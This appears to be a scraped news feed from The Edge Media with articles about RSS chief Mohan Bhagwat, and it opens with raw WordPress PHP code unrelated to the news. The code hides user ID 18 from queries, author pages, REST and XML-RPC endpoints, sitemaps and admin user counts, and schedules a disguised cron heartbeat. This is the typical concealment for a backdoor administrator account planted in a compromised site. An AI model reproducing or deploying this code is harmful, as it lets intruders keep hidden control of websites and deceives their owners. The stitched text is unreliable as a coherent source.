add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Mohan Bhagwat Clarifies RSS Identity And Rejects Paramilitary Tag appeared first on The Edge Media.
]]>Addressing a gathering of prominent citizens on Friday, Bhagwat said the RSS works to unite society and instil values and virtues to ensure that India never again comes under foreign domination. He explained that while the organisation conducts marches and traditional stick exercises, it remains a unique social body focused on character building rather than military structure.
Bhagwat emphasised that the Sangh should not be interpreted through the activities of the BJP or even through organisations like Vidya Bharti, stating that such comparisons fail to capture its true essence.
Although the RSS is widely regarded as the ideological parent of the Jana Sangh and its successor, the BJP, he maintained that the Sangh has its own independent purpose and functioning.
He also pointed out that a false narrative has been created around the RSS, largely due to superficial understanding and reliance on incomplete sources of information. According to him, many people do not explore original or credible references and instead depend on secondary platforms, which often present distorted views. Those who consult authentic sources, he said, can better understand the Sangh’s philosophy and work.
During the centenary year of the RSS, Bhagwat toured the country to address misconceptions and explain the organisation’s role.
He said the Sangh nurtures swayamsevaks by imparting values, discipline, and a collective vision aimed at achieving Bharat’s Param Vaibhav, or highest glory. He clarified that swayamsevaks are not controlled remotely, but are shaped through grassroots work carried out in local shakhas to create a patriotic and socially responsible environment.
Rejecting the notion that the RSS emerged as a reactionary force, Bhagwat said the organisation was neither formed in opposition to anyone nor does it compete with other entities. He added that the Sangh’s purpose is constructive and rooted in long term national development.
Reflecting on India’s history, Bhagwat observed that British rule was not the first instance of foreign invasion. He said that repeatedly, smaller groups from distant lands managed to defeat India despite lacking its wealth and cultural depth. This, he noted, raises important questions about internal weaknesses and the need for social unity to safeguard independence.
He stressed that while political freedom has been achieved, mental slavery still persists to some degree and must be overcome. He urged people to rise above selfish interests and foster unity based on shared values, asserting that a virtuous and cohesive society can positively transform the nation’s future.
The RSS chief also encouraged cultural self confidence, calling on people to take pride in their devotional traditions and indigenous food habits. Supporting the idea of Swadeshi, he said self reliance requires self pride, and citizens should prioritise goods produced within the country that generate employment locally. At the same time, he clarified that being Swadeshi does not mean cutting off trade with the world, but ensuring that imports are limited to essentials and conducted on India’s own terms, without external pressure.
Bhagwat stated that the financial position of the RSS is stable and that the organisation does not rely on external funding or donations. Recalling its past struggles, he said the Sangh faced opposition not only during British rule but also after Independence, including severe pressure, attacks, and even assassinations. He noted that such efforts to suppress the organisation still occur, though their intensity has reduced.
Concluding his address, Bhagwat invited people to visit an RSS shakha to gain firsthand understanding of the organisation. He said that true comprehension cannot come merely from explanations, comparing it to understanding the taste of sugar, which can only be known by experiencing it directly.
The post Mohan Bhagwat Clarifies RSS Identity And Rejects Paramilitary Tag appeared first on The Edge Media.
]]>The post RSS Chief Mohan Bhagwat Begins Four Day Visit to Andaman and Nicobar Islands appeared first on The Edge Media.
]]>During the trip, Bhagwat will participate in a series of events held to commemorate the 116th anniversary of Savarkar’s poem Sagara Praan Talamalala. Union Home Minister Amit Shah will also take part in the programmes. Among the other prominent personalities expected to attend are Union minister Ashish Shelar, musician Hridaynath Mangeshkar, actor Randeep Hooda, and historian Vikram Sampath.
On Friday, Bhagwat will visit Chinmaya Mission at around 10.30 am to interact with monks. Later in the day, he and Shah will unveil a statue of Savarkar at Beodnabad at approximately 3.30 pm. Around 4.30 pm, he is scheduled to release a song dedicated to Savarkar at an event at Dr B R Ambedkar Institute of Technology.
On Saturday, Bhagwat will address the Virat Hindu Sammelan at Netaji Stadium in Sri Vijaya Puram.
The post RSS Chief Mohan Bhagwat Begins Four Day Visit to Andaman and Nicobar Islands appeared first on The Edge Media.
]]>The post Mohan Bhagwat : CAA – NRC has nothing to do with Muslims citizens of India appeared first on The Edge Media.
]]>The CAA-NRC is not a law made against any Indian citizen. Muslim citizens of India will not be harmed by the CAA. Some people have made it a Hindu-Muslim issue to take political benefits. For political gains, both subjects [CAA-NRC] have been made the subject of Hindu-Muslim. It is not the subject of Hindu-Muslim,” Mohan Bhagwat said.
He was speaking at the launch of a book titled, “Citizenship Debate over NRC and CAA, Assam and the Politics of History” authored by Nani Gopal Mahanta in Guwahati. The event was also attended by Assam Chief Minister Dr Himanta Biswa Sarma.
He further said that after the partition of India, the new nations had promised to take care of their respective minority communities.
The post Mohan Bhagwat : CAA – NRC has nothing to do with Muslims citizens of India appeared first on The Edge Media.
]]>The post Ram Temple Trust Chief Tested Positive For Corona Virus appeared first on The Edge Media.
]]>
Das was among the five people on the stage at the grand ceremony at Ayodhya in Uttar Pradesh on August 5. The others on the stage were Uttar Pradesh Chief Minister Yogi Adityanath, Governor Anandiben Patel and Mohan Bhagwat, chief of the Rashtriya Swayamsevak Sangh.
The post Ram Temple Trust Chief Tested Positive For Corona Virus appeared first on The Edge Media.
]]>